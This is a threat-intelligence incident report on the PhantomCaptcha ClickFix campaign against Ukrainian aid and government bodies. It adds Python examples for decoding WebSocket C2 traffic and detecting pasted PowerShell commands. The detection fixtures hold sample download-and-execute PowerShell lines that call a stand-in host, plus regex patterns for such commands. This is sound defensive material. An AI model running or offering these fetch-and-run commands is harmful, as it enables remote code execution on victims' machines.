Full Report
A spearphishing attack that lasted a single day targeted members of the Ukrainian regional government administration and organizations critical for the war relief effort in Ukraine, including the International Committee of the Red Cross, UNICEF, and various NGOs. [...]
Analysis Summary
# Incident Report: PhantomCaptcha ClickFix Attack Targeting Ukraine Relief Efforts
## Executive Summary
A one-day spearphishing campaign, dubbed PhantomCaptcha, targeted Ukrainian regional government administration and aid organizations (including the ICRC and UNICEF) on October 8, 2025. Victims were led to a fake Cloudflare CAPTCHA presented as a Zoom verification step; the page instructed them to paste a command into Windows Command Prompt (the ClickFix technique), which launched PowerShell and ultimately deployed a WebSocket Remote Access Trojan (RAT). The observed impact was host reconnaissance and staging for remote access and data exfiltration; the command-and-control (C2) infrastructure was hosted on Russian infrastructure.
## Incident Details
- Discovery Date: Not stated; the campaign was identified and analyzed by SentinelLABS.
- Incident Date: October 8, 2025 (Single day campaign).
- Affected Organization: Ukrainian regional government administration and war relief organizations (ICRC, UNICEF, NGOs).
- Sector: Government Administration, Non-Profit/Aid Organization.
- Geography: Ukraine.
## Timeline of Events
### Initial Access
- Date/Time: October 8, 2025 (Specific time unknown, campaign duration was one day).
- Vector: Spear-phishing email disguised as communications from the Ukrainian President’s Office.
- Details: Emails contained malicious PDF attachments linking to a domain impersonating Zoom (`zoomconference[.]app`).
### Lateral Movement
- Details: Not observed in the reported activity. The infection chain first ran a reconnaissance utility (`cptch`) that collected system data (OS, domain, user, processes, UUID) before deploying the final WebSocket RAT; the RAT's remote command execution would support lateral movement in a later phase.
### Data Exfiltration/Impact
- Details: The first stage payload collected system configuration data. The final WebSocket RAT was capable of remote command execution and data exfiltration via base64-encoded JSON commands. A subsequent, potentially related operation involved Android spyware targeting Lviv users.
### Detection & Response
- Detection: Identified and analyzed by SentinelLABS threat researchers.
- Response Actions: Not explicitly detailed in the provided text, but analysis of the threat infrastructure was performed.
## Attack Methodology
- Initial Access: Spear-phishing via email with malicious documents linking to a fake Zoom landing page.
- Persistence: Unknown for the initial stage, but the final payload was a WebSocket RAT, implying long-term command-and-control capability.
- Privilege Escalation: None observed; the PowerShell payload ran with the privileges of the user who pasted the command into Command Prompt (ClickFix).
- Defense Evasion: Utilized a multi-stage process masquerading as legitimate web services (Zoom/Cloudflare CAPTCHA) to trick the user into executing system commands.
- Credential Access: Not explicitly detailed, but within reach of the RAT's remote command execution.
- Discovery: System profiling utility (`cptch`) collected environment details (computer name, domain info, username, PIDs, UUID).
- Lateral Movement: Enabled via the WebSocket RAT's remote command execution capability.
- Collection: System data gathered by the reconnaissance utility; data exfiltration capability built into the final RAT.
- Exfiltration: Data exfiltration supported via base64-encoded JSON commands over the WebSocket protocol.
- Impact: System compromise, deployment of a RAT, and reconnaissance of victim environments.
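The exfiltration bullet above describes the RAT's channel only as base64-encoded JSON over WebSocket. The following is an added example, not code from the report or from the malware, showing how an analyst can unwrap captured WebSocket text frames to recover the commands and results inside them. The frames, the client identifier and the message fields (`id`, `type`, `args`, `data`) are constructed assumptions; only the base64-wrapped-JSON framing comes from the report.

```python
"""Decoder for a WebSocket C2 channel that wraps JSON messages in base64.
The frames below are constructed for illustration; the message schema
(id/type/args/data) is an assumption, not the RAT's real protocol."""
import base64
import binascii
import json
from typing import Optional


def wrap(obj: dict) -> str:
    """Encode a message the way the assumed RAT does: JSON -> UTF-8 -> base64."""
    return base64.b64encode(json.dumps(obj).encode("utf-8")).decode("ascii")


CLIENT_ID = "3f9a1c2e-constructed-id"  # assumed per-victim identifier

# Constructed session: (direction, text-frame payload). Not a real capture.
CAPTURED_FRAMES = [
    ("client", wrap({"id": CLIENT_ID, "type": "register", "host": "WS-01", "user": "jdoe"})),
    ("server", wrap({"id": CLIENT_ID, "type": "cmd", "args": "whoami /all"})),
    ("client", wrap({"id": CLIENT_ID, "type": "result",
                     "data": base64.b64encode(b"corp\\jdoe\r\n").decode("ascii")})),
    ("client", "ping"),  # keepalive text frame, not base64 JSON
]


def decode_b64_json(payload: str) -> Optional[dict]:
    """Return the JSON object hidden in a base64 text frame, or None if the
    frame is not base64, not UTF-8, not JSON, or not a JSON object."""
    try:
        raw = base64.b64decode(payload, validate=True)
    except binascii.Error:
        return None
    try:
        obj = json.loads(raw.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError):
        return None
    return obj if isinstance(obj, dict) else None


def analyze_session(frames):
    """Unwrap every frame, pull out tasking (server -> client) and results
    (client -> server), and flag the session when most frames are
    base64-wrapped JSON and at least one command was issued."""
    decoded, commands, results = [], [], []
    for direction, payload in frames:
        msg = decode_b64_json(payload)
        if msg is None:
            continue
        decoded.append((direction, msg))
        if direction == "server" and msg.get("type") == "cmd":
            commands.append(msg.get("args"))
        if direction == "client" and msg.get("type") == "result":
            # Result bodies are assumed to be base64 a second time.
            try:
                results.append(base64.b64decode(msg.get("data", ""), validate=True)
                               .decode("utf-8", "replace"))
            except binascii.Error:
                results.append(None)
    ratio = len(decoded) / len(frames) if frames else 0.0
    return {
        "client_ids": sorted({m.get("id") for _, m in decoded if "id" in m}),
        "commands": commands,
        "results": results,
        "b64_json_ratio": ratio,
        "suspicious": ratio >= 0.5 and bool(commands),
    }


if __name__ == "__main__":
    for key, value in analyze_session(CAPTURED_FRAMES).items():
        print(f"{key}: {value}")
```

The ratio check is schema-agnostic and is the part worth keeping when the real message fields differ: legitimate WebSocket applications rarely base64-wrap every JSON message, so a session where most text frames decode this way is a useful trigger for closer inspection even before the fields are understood.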
## Impact Assessment
- Financial: Not disclosed.
- Data Breach: System configuration data collected; potential for further data theft via RAT.
- Operational: Limited to hosts where the pasted command was executed; the campaign itself lasted a single day.
- Reputational: Potential damage to the reputations of targeted relief organizations.
## Indicators of Compromise
- Network Indicators: Phishing landing domain `zoomconference[.]app` impersonating Zoom; WebSocket C2 channel; C2 infrastructure hosted on **Russian infrastructure** (specific IPs and further domains are not reproduced here).
- File Indicators: Reconnaissance script **`cptch`**, which profiles the host and stages the final WebSocket RAT.
- Behavioral Indicators: User copies a "verification token" from the fake CAPTCHA page and pastes it into Windows Command Prompt, which launches PowerShell; a client identifier generated on the victim is sent over the WebSocket connection and can be used to track individual victims for follow-on social engineering.
## Response Actions
- Containment: Not detailed in the source; standard practice is to isolate affected hosts and block the phishing domain and the WebSocket C2 endpoints.
- Eradication: Not detailed in the source; standard practice is to remove the RAT, the `cptch` stage and any persistence mechanism they created.
- Recovery Actions: Not detailed in the source; standard practice is to rebuild or roll back affected hosts, rotate credentials used on them, and validate that C2 traffic has stopped.
## Lessons Learned
- Sophisticated social engineering remains effective, leveraging established infrastructure like Zoom and CAPTCHA prompts to lower user suspicion.
- Attackers are willing to invest significant time in infrastructure setup (domains registered months prior) for short, high-impact campaigns.
- The use of native Windows functions (PowerShell execution via Copy/Paste) remains a highly effective, low-signature infection vector.
## Recommendations
- Restrict interactive command execution for standard users where it is not needed (for example, disable the Run dialog and Command Prompt by policy, and apply PowerShell Constrained Language Mode or AppLocker/WDAC), and alert on cmd.exe or explorer.exe spawning PowerShell with encoded or download-and-execute arguments, since ClickFix depends on the user pasting such a command.
- Enhance network monitoring for unexpected WebSocket traffic patterns, particularly those associated with C2 communication.
- Conduct targeted phishing simulation training focused on sophisticated brand impersonation (government offices, common communication platforms like Zoom, and security checks like CAPTCHAs).
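The behavioral indicator above (a command pasted into Command Prompt that launches PowerShell) and the first recommendation both come down to one process relationship: cmd.exe, or explorer.exe for the Run dialog, spawning PowerShell with download-and-execute arguments. This added example (not from the report or from SentinelLABS) runs that heuristic over constructed Sysmon-style process creation events, decoding any `-EncodedCommand` payload so the indicators can be matched against the plaintext as well. The command lines, paths, user names and the `example.invalid` URL are made up, and the indicator set and alert threshold are assumptions to tune per environment.

```python
"""Heuristic detection for ClickFix executions: an interactive parent
(cmd.exe, or explorer.exe for the Win+R Run dialog) launching PowerShell
with download-and-execute style arguments. All sample events are constructed."""
import base64
import re
from typing import Optional

INTERACTIVE_PARENTS = {"cmd.exe", "explorer.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Indicator name -> regex applied to the command line and, when present, to
# the decoded -EncodedCommand payload. Alert when >= ALERT_THRESHOLD fire.
INDICATORS = [
    ("encoded_command", re.compile(r"(?:^|\s)-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no_profile", re.compile(r"-no(?:p|profile)\b", re.I)),
    ("invoke_expression", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("web_download", re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b", re.I)),
    ("policy_bypass", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)),
]
ALERT_THRESHOLD = 2  # assumption: two independent indicators before alerting
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# Constructed stage-two command, base64 of UTF-16LE as PowerShell expects it.
_STAGE2_B64 = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2')"
    .encode("utf-16-le")).decode("ascii")

# Constructed Sysmon Event ID 1 style records (Image, ParentImage, CommandLine, User).
SAMPLE_EVENTS = [
    {   # pasted ClickFix command: cmd.exe -> hidden, encoded PowerShell
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "powershell.exe -w hidden -nop -enc " + _STAGE2_B64,
        "User": r"CORP\jdoe",
    },
    {   # admin running a signed inventory script from the Run dialog: benign
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\tools\inventory.ps1",
        "User": r"CORP\admin",
    },
    {   # ordinary interactive use: benign
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"powershell.exe Get-ChildItem C:\logs",
        "User": r"CORP\jdoe",
    },
    {   # plaintext ClickFix variant without -enc
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "powershell -nop -w hidden -c \"iex (iwr 'https://example.invalid/verify' -UseBasicParsing)\"",
        "User": r"CORP\asmith",
    },
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> Optional[dict]:
    """Return an alert dict for a ClickFix-like process creation, else None."""
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    if parent not in INTERACTIVE_PARENTS or image not in POWERSHELL_IMAGES:
        return None
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    hits = set()
    for name, pattern in INDICATORS:
        if pattern.search(cmdline):
            hits.add(name)
        if decoded and pattern.search(decoded):
            hits.add("decoded:" + name)
    if len(hits) < ALERT_THRESHOLD:
        return None
    return {"user": event.get("User"), "parent": parent,
            "indicators": sorted(hits), "decoded": decoded}


def find_clickfix(events) -> list:
    """Run the heuristic over a batch of events and return the alerts."""
    return [alert for alert in (analyze_event(e) for e in events) if alert]


if __name__ == "__main__":
    for alert in find_clickfix(SAMPLE_EVENTS):
        print(alert)
```

Decoding the encoded payload matters because a pasted command can carry every download-and-execute token inside the base64 blob; without it the only visible signals are the flags around it, and the `-ExecutionPolicy Bypass` script in the second sample shows why a single flag should not alert on its own.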